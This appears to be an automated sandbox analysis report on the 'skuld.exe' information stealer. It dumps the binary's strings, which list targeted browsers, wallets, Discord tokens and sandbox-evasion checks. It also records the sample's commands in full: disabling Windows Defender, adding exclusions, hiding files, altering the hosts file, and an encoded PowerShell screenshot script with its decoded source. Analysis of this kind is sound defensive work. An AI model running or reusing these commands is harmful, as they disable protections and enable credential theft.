                        Source: SecurityHealthSystray.exe.0.drBinary or memory string: max=scav ptr ] = (usageinit ms, fault tab= top=[...], fp:MarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilcpu%dfilesimap2imap3imapspop3shostsrouteparseSHA-1sse41sse42ssse3matchrune NRGBAtls: Earlyutf-8%s*%dtext/bad n (at ClassP-224P-256P-384P-521ECDSAx32dbgvmsrvcprl_ccx96dbgdbgclrde4dotwindbgpc-retx64dbgghidraVMwarevmwarexc64zb8VizSM373836ALIONETVM-PCgeorgeGRAFPCT00917test42XC64ZB5Y3y73serverh86LHDDdQrgcQfofoGlK3zMRPgfV1XIZZuXj8vizsmASPNETS7WjufUser01tHiF2TGjBsjbLouiseGGw8NR3W1GJT-ForceattribNumberembedssqliteChromeChedotKometaFenrirCoowonLiebaoDragonCocCocYandexsecretpaypalbanquewalletcryptoexodusatomiccomptecreditpermisnumberbackupconfigVideosinlinefieldsConfigIntentMeteorImpactPolyMCBypassSystem
                        Source: SecurityHealthSystray.exe.0.drBinary or memory string: tznameAES-NIrdtscppopcntsha256SHA-NIempty rune1 RGBA64Gray16X25519%w%.0wAcceptServercmd/goheaderAnswerLengthsha512%s: %sSTREETavx512rdrandrdseedwebhookcryptosregeditollydbgdf5servvmusrvctaskmgrqemu-gafakenetfiddlerdumpcapsharpodsnifferpetoolsharmonycharlesphantomx32_dbgx64_dbgwpe pro3u2v9m8SERVER1MIKE-PCNETTYPClisa-pcHEUeRzljohn-pcZELJAVALISA-PCWILEYPCJOHN-PCserver1wileypcAIDANPC7DBgdxuJAW4Dz0cMkNdS6Mr.Nonej7pNjWMequZE3Jo6jdigqKUv3bT4ymONofgheuerzlIVwoKUFavg.comDefaultFirefoxMercuryAddressNetworkCookiesHistorykey4.dbThoriumIridiumVivaldiOrbitumMaxthonK-MelonSputnikSlimjetOperaGXaccountaddressDesktopcontentAppDatadiscordmodulesRoamingversionWindowsFeatherBadlionleveldbAPPDATACaption%.2f GBprofileDiscord`Nitro`.sqlitecmd.exeWallets\ArmoryCoinomiBinanceMartianPhantomSafepalSolfareiWalletLICENSEProtectfloat32float64readdirconsoleabortedCopySidWSARecvWSASendconnectsignal runningPATHEXT_pragmapragma _txlocknumber nil keyUpgradeTrailersocks5hHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGname %q:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECT19531259765625FreeSidSleepExinvaliduintptrSwapperChanDir Value>Convert\\.\UNCforcegcallocmWcpuprofallocmRunknowngctraceIO waitsyscallwaitingforevernetworkUNKNOWN:events, goid= s=nil
                        Source: SecurityHealthSystray.exe.0.drBinary or memory string: (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type TuesdayJanuaryOctoberMUI_StdMUI_DltAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutapdh.dllwindowswsarecvwsasendlookup writetoAES-CBCfips140SHA-224SHA-256SHA-384SHA-512avx512fInstAltInstNopalt -> nop -> any -> NRGBA64tls3desInitialExpiresSubjectcharsetos/execruntimeanswers]?)(.*)Ed25519MD5-RSAserial:eae_prkderived2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amxtileamxint8amxbf16osxsavevmtoolsdvboxtraypestudiovmacthlpksdumperdebuggerstrongodgraywolf0harmonyreversalUSERNAMEEIEEIFYEGBQHURCCORXGKKZCoreleepcJBYQTQBOMARCI-PClmVwjj9bGRXNNIIELUCAS-PCjulia-pcXGNSVODUESPNHOOLORELEEPCVONRAHELTMKNGOMUJULIA-PC05h00Gi05ISYH9SHICQja5iTQZSBJVWMUspG1y1CecVtZ5wEBUiA1hkmOZFUCOD6o8yTi52Th7dk1xPrQORxJKNkgL50ksOpSqgFOf3Gj.seancedxd8DJ7clmvwjj9beset.com-CommandDisabled0.0.0.0 Web DataWaterfoxK-MeleonCyberfoxBlackHawUsernamePasswordBrowsers```%s```ChromiumElementsCatalinaQIP SurfpasswordbancairemetamaskdatabasePicturesOneDriveindex.jsSettingssettings.featherNovolinealts.txtPaladiumgames-%s
                        Source: SecurityHealthSystray.exe.0.drBinary or memory string: runtime: sp=abi mismatchwrong timersnot pollableCypro_MinoanMeetei_MayekPahawh_HmongSora_SompengSyloti_NagriPdhOpenQueryLittleEndianmultipathtcp127.0.0.1:53no such hostunknown portCIDR addressinvalid portgetaddrinfowtransmitfileCreateEventACreateThreadGetTickCountPeekMessageWNetGetDCNameinvalid baseInstAltMatchunexpected )altmatch -> anynotnl -> tlsunsafeekmclose notifyremote errorc hs traffics hs trafficc ap traffics ap trafficMime-VersionX-ImforwardsX-Powered-ByContent Type (sensitive)gotypesaliasRCodeSuccessRCodeRefusedunknown sizeECDSA-SHA256ECDSA-SHA384ECDSA-SHA512caller errorCoInitializeoleaut32.dllVariantClearSysStringLenRoInitializeSERIALNUMBERavx5124fmapsavx512bitalgvgauthservicevmwareservicejoeboxcontrolprocesshackerhttp debuggerextremedumperprotection_idw0fjuOVmCcP5Acompname_5076SYKGUIDE-WS17DESKTOP-BUGIOCOMPNAME_4047DOMIC-DESKTOPharry johnsonRGzcBUyrznRegw0fjuovmccp5aHarry Johnsonsal.rosenburg34.85.253.170109.74.154.9034.145.89.174192.40.57.234109.74.154.9134.145.195.5887.166.50.21335.192.93.10779.104.209.33213.33.142.5034.141.245.2588.132.231.7134.105.72.24193.216.75.209195.239.51.5920.99.160.17334.85.243.24184.147.54.113195.74.76.222192.87.28.10364.124.12.16234.105.183.6834.142.74.22092.211.55.199109.74.154.9235.229.69.22723.128.248.46scanguard.compcprotect.comus.norton.comkaspersky.combullguard.comzonealarm.combrowsers-tempdownloads.txtplaces.sqlitenssA102 errorFiles StealerdiscordcanaryBetterDiscorditerations_ivaccounts.jsonmeteor-clientCheatBreakersRise (Intent)Local StorageContenu de laAuthorization`Nitro Basic`AuthenticatorIsUserAnAdminFindFirstFilelevel 3 resetsrmount errortimer expiredexchange fullRegEnumKeyExWRegOpenKeyExWCertOpenStoreFindNextFileWMapViewOfFileVirtualUnlockWriteConsoleWFreeAddrInfoWgethostbynamegetservbynameRegDeleteKeyWRegEnumValueW relative to %s: %s (%v)%sempty integerunsupported: RtlMoveMemoryOpenClipboardSTREAM_CLOSEDCONNECT_ERRORWINDOW_UPDATECache-ControlLast-ModifiedAccept-RangesIf-None-Match[FrameHeader invalid base accept-rangesauthorizationcache-controlcontent-rangeif-none-matchlast-modifiedFQDN too longsocks connectReset ContentLoop Detectedfield name %q3814697265625GetDriveTypeWDeleteServiceStartServiceWFindResourceWModule32NextWThread32FirstWaitCommEventRtlGetVersionRtlInitStringCoTaskMemFreeEnumProcessesShellExecuteWExitWindowsExGetClassNameWtimeEndPeriodWTSFreeMemorydalTLDpSugct?GetTempPath2WwakeableSleepprofMemActiveprofMemFuturetraceStackTabexecRInternaltestRInternalGC sweep waitsynctest.Waitout of memory is nil, not value method span.base()=bad flushGen , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase}
                        Source: skuld.exe, 00000000.00000002.2739920136.0000027D3C8BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\skuld.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exe
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exeJump to behavior
                        Bypasses PowerShell execution policy
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABT
                        Encrypted powershell cmdline option found
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}Jump to behavior
                        Modifies Windows Defender protection settings
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                        Modifies the hosts file
                        Source: C:\Users\user\Desktop\skuld.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\Desktop\skuld.exeJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUIDJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exeJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get CaptionJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get NameJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUIDJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.cmdline"
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD9F3.tmp" "c:\Users\user\AppData\Local\Temp\dh1o0wbe\CSC88D051478A0408BB4BF8545E397BDC4.TMP"
